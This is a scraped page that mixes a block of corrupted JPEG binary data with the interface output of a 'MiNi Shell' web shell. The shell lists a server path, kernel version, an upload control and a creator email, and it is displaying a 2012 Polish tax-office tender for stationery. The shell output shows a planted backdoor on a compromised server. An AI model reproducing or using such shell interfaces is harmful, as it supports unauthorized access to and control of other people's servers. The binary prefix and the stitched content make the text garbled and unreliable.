JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120322/89080-N-2012.html

<p class="kh_header"><b>Bydgoszcz: Dostawa artykułów papierniczych</b><br>
<b>Numer ogłoszenia: 89080 - 2012; data zamieszczenia: 22.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pierwszy Urząd Skarbowy w Bydgoszczy , ul. Fordońska 77, 85-950 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3452771, faks 052 5848294.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów papierniczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa artykułów papierniczych o następujących parametrach wymaganych, wyszczególnionych poniżej:

- papier kserograficzny A-4, gramatura - 80 ? 2 g/m2, wilgotność - 3,8 - 5,0%, grubość - 108 ? 3 ?m, białość - 161 ? 2 CIE,  gładkość - 180 ? 50 cm3 /min (szorstkość wg Bendtsen), jasność 65 (z UV) 110 ? 2 % - ryza (500 kartek) - 3000,
- koperta z okienkiem prawym, C-6, o wym. 114mm x 162mm, w kolorze białym , samoklejąca - karton (1000 szt.) - 30,
- koperty bez okienka, C-6, o wym. 114mm x 162mm, w kolorze białym, samoklejąca - karton (1000 szt.) - 50,
- koperta bez okienka, C-5, o wym. 162mm x 229mm, w kolorze białym, samoklejąca z paskiem, z klejem wzdłuż krótszego boku - karton (500 szt.) -  40,
- koperta bez okienka, C-4, o wym. 229mm x 324mm, w kolorze białym, samoklejąca z paskiem - karton (250 szt.) - 30, 
- koperta DL, z okienkiem prawym, o wym. 110mm x 220mm, w kolorze białym, samoklejąca z paskiem - karton (karton 1000 szt.) - 50,
- skoroszyt kartonowy A-4, w kolorze białym, wykonany z kartonu o grubości 250 g/m2, z wewnętrznym metalowym wąsem umieszczonym w dodatkowym pasku tektury zwiększającym jego wytrzymałość - szt. - 12.000,
- skoroszyt kartonowy A-4, w kolorze białym, wykonany z kartonu o grubości 250 g/m2, z zawieszką umożliwiającą wpięcie do segregatora, z okładką wierzchnią wykonaną do połowy, z wewnętrznym metalowym wąsem umieszczonym w dodatkowym pasku tektury zwiększającym jego wytrzymałość - szt. - 2.000,
- skoroszyt kartonowy A-4, w kolorze białym, wykonany z kartonu o grubości 250 g/m2, z zawieszką umożliwiającą wpięcie do segregatora, z okładką wierzchnią całą, z wewnętrznym metalowym wąsem umieszczonym w dodatkowym pasku tektury zwiększającym jego wytrzymałość - szt. - 2.000,
- kalka ołówkowa, A-4, koloru niebieskiego, powlekana woskiem, z warstwą plastikową zapewniającą antypoślizgowość, o dużej intensywności zabarwienia (nie gorsza niż typu Pelikan 500H) - opakowanie (100 szt.) - 2,
- naklejka na segregator, samoprzylepna, o wym. 55mm x 155 mm - szt. - 2.000,
-segregator A-4,  wykonany z tektury pokrytej folią polipropylenową, posiadający dźwignię z dociskaczem, o szerokości grzbietu:  75 mm, wyposażony w metalową listwę chroniącą krawędzie oraz wzmocniony otwór na palec, z dwustronną wymienną etykietą grzbietową, różne kolory- szt. - 1.000,
- papier komputerowy, składanka, o wym. 390mm x 12m x 1, w kolorze białym, 70g - karton (2000 szt.) - 40,
- papier komputerowy, składanka, o wym. 240mm x 12m x 1, w kolorze białym, 70g - karton (2000 szt.) - 10,
- bloczek samoprzylepny, z substancją klejącą usuwalną za pomocą wody, karteczki w żółtym kolorze, ilość karteczek: 100, wymiary: 76mm x 76mm - szt. - 260,
- kostka klejona, karteczki w białym kolorze, wymiary: 8,5cm x 8,5 cm x 4 cm - szt. - 520,
- teczka kartonowa A-4, wiązana, wykonana z kartonu o grubości 250 g/m2, posiadająca trzy wewnętrzne klapki zabezpieczające dokumenty przed wypadnięciem - szt. - 15.000,
- rolka kasowa z papieru offsetowego o wym. szer. 57 mm dł. 30 m - szt. - 70
- blok biurowy, w kratkę, format A-5, 100-kartkowy, klejony po krótszym boku - szt. - 100,
- blok biurowy, w kratkę, format A-4, 100-kartkowy, klejony po krótszym boku - szt. - 80,
- zeszyt, format A-5, 96-kartkowy, w kratkę, sztywna oprawa - szt. - 20,
- zeszyt, format A-4, 96-kartkowy, w kratkę, sztywna oprawa - szt. - 30,
- zeszyt, format A-4, 96-kartkowy, w kratkę, miękka oprawa - szt. - 30,
- teczka do podpisu, wykonana z kartonu pokrytego tworzywem sztucznym, z rozciągliwym grzbietem harmonijkowym pozwalającym na segregowanie grubszych plików dokumentów, 10 wewnętrznych stron z usztywnionego kartonu o wzmocnionej dolnej krawędzi, z otworami do przeglądania zawartości, z okienkiem do opisu na frontowej okładce, różne kolory - szt. - 30,
- bloczek samoprzylepny, z substancją klejącą usuwalną za pomocą wody, karteczki w żółtym kolorze, ilość karteczek: 100, wymiary: 125mm x 75mm - szt. - 20,
- skoroszyt kartonowy, A-4, oczkowy, w kolorze białym, wykonany z kartonu o grubości 250 g/m2, z wewnętrznym metalowym wąsem umieszczonym w dodatkowym pasku tektury zwiększającym jego wytrzymałość - szt. - 2.000.

2. Dopuszcza się dostawę zamawianych artykułów w opakowaniach zawierających inną liczbę sztuk niż podana w opisie przedmiotu zamówienia.
3. Wykorzystanie w opisie przedmiotu zamówienia nazw własnych oraz znaków towarowych ma na celu wyłącznie  zapewnienie zachowania standardów jakości artykułu. W przypadku zaproponowania produktu równoważnego wymaga się, aby odpowiadał on pod względem jakości, trwałości, funkcjonalności oraz estetyki wykonania produktom wskazanym przez Zamawiającego.
4. Wszystkie artykuły papiernicze będące przedmiotem zamówienia winny być wyrobami fabrycznie nowymi, nieużywanymi, wolnymi od wad.
5. Zapotrzebowanie na poszczególne dostawy będą składane za pośrednictwem faksu lub poczty elektronicznej.
6. Wszystkie artykuły papiernicze, będące przedmiotem poszczególnych dostaw, Wykonawca zobowiązany jest dostarczyć do siedziby Zamawiającego oraz rozmieścić w magazynie według wskazań pracownika Zamawiającego.
7. Na każde żądanie Zamawiającego Wykonawca jest zobowiązany okazać w stosunku do przedmiotu zamówienia odpowiedni certyfikat zgodności z Polską Normą lub normami europejskimi.
8. W przypadku stwierdzenia, że dostarczone artykuły papiernicze:
- są uszkodzone, posiadają wady uniemożliwiające użytkowanie, a wady i uszkodzenia te nie powstały z winy Zamawiającego lub
- nie spełniają wymagań Zamawiającego określonych powyżej lub
- dostarczone artykuły równoważne nie odpowiadają pod względem jakości, trwałości, funkcjonalności oraz estetyki wykonania produktom wskazanym  przez Zamawiającego,
Wykonawca wymieni je na nowe, prawidłowe, na własny koszt.
9. Zamawiający wymaga:
- dostarczenia zamówionych artykułów w ciągu 24 godzin od złożonego zapotrzebowania,
- należytej staranności przy realizacji zobowiązań umowy.                                                                                                     
10. Istotne postanowienia umowy określa wzór umowy stanowiący załącznik 
nr 1 do niniejszej Specyfikacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.76.30-1, 30.19.93.30-2, 30.19.95.00-5, 30.19.92.30-1, 22.85.10.00-0, 30.19.91.10-4, 22.81.60.00-3, 22.81.63.00-6, 22.81.61.00-4, 30.14.51.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty i oświadczenia złożone przez Wykonawcę, określone w 
§ 7 niniejszej Specyfikacji: Wykaz oświadczeń lub dokumentów wymaganych od Wykonawcy, metodą warunku granicznego - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty i oświadczenia złożone przez Wykonawcę, określone w 
§ 7 niniejszej Specyfikacji: Wykaz oświadczeń lub dokumentów wymaganych od Wykonawcy, metodą warunku granicznego - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty i oświadczenia złożone przez Wykonawcę, określone w 
§ 7 niniejszej Specyfikacji: Wykaz oświadczeń lub dokumentów wymaganych od Wykonawcy, metodą warunku granicznego - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty i oświadczenia złożone przez Wykonawcę, określone w 
§ 7 niniejszej Specyfikacji: Wykaz oświadczeń lub dokumentów wymaganych od Wykonawcy, metodą warunku granicznego - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty i oświadczenia złożone przez Wykonawcę, określone w 
§ 7 niniejszej Specyfikacji: Wykaz oświadczeń lub dokumentów wymaganych od Wykonawcy, metodą warunku granicznego - spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.izba-skarbowa.bydgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pierwszy Urząd Skarbowy w Bydgoszczy
ul. Fordońska 77
85-950 Bydgoszcz
pokój nr 904B - IX p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2012 godzina 09:00, miejsce: Pierwszy Urząd Skarbowy w Bydgoszczy
ul. Fordońska 77
85-950 Bydgoszcz
pokój nr 701 - VII p. - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com